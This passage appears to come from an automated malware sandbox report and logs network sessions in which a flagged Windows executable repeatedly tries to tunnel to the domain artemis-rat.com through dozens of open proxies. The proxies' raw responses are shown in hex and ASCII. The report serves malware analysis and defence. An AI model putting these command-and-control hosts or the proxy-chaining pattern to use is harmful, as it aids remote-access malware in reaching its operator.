                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1169192.168.2.453768104.17.16.87807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.355106115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.509402037 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1170192.168.2.453628222.223.103.23273027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.369800091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.717705011 CET90INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              Connection: close
                                              Content-Length: 55


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1171192.168.2.453006103.244.145.13831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.381108046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.206526041 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1172192.168.2.453606116.199.168.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.382133007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1173192.168.2.45372638.162.21.5431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.388703108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.801033974 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1174192.168.2.453718184.170.245.14841457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.466156006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1175192.168.2.45295785.109.104.10090907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.466300964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.568808079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.663393974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.375021935 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1176192.168.2.45369189.168.121.17531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.468240976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.773053885 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1177192.168.2.45370687.106.114.12460057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.468409061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1178192.168.2.453141163.172.132.238163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.468955040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.568799019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.663404942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.757330894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.866209030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.776016951 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1179192.168.2.453712178.54.21.20380817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.471328020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1180192.168.2.45380731.43.179.160807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.471750975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.625757933 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1181192.168.2.453074185.109.184.150560677284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.477629900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.568820000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1182192.168.2.45371465.21.255.19731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.477971077 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:22.805444002 CET75INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Length: 0
                                              Mar 11, 2024 08:37:23.180032969 CET103INHTTP/1.1 400 Bad Request
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                              Data Ascii: 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1183192.168.2.453122154.73.29.16180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.494440079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.558075905 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1184192.168.2.45372443.131.245.216156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.495491028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1185192.168.2.45165194.131.14.6610807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.496689081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.365652084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1186192.168.2.453781163.172.166.35163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.497473001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163324118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.054457903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866669893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.554049969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.257076979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.866565943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.751574039 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1187192.168.2.453729134.209.105.20931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.504573107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.835115910 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1188192.168.2.4537515.75.161.31482377284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.504574060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1189192.168.2.453767202.61.204.51807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.512423992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366293907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367131948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257389069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.616884947 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:29 GMT
                                              Server: Apache/2.4.38 (Debian)
                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Content-Length: 630
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfigura
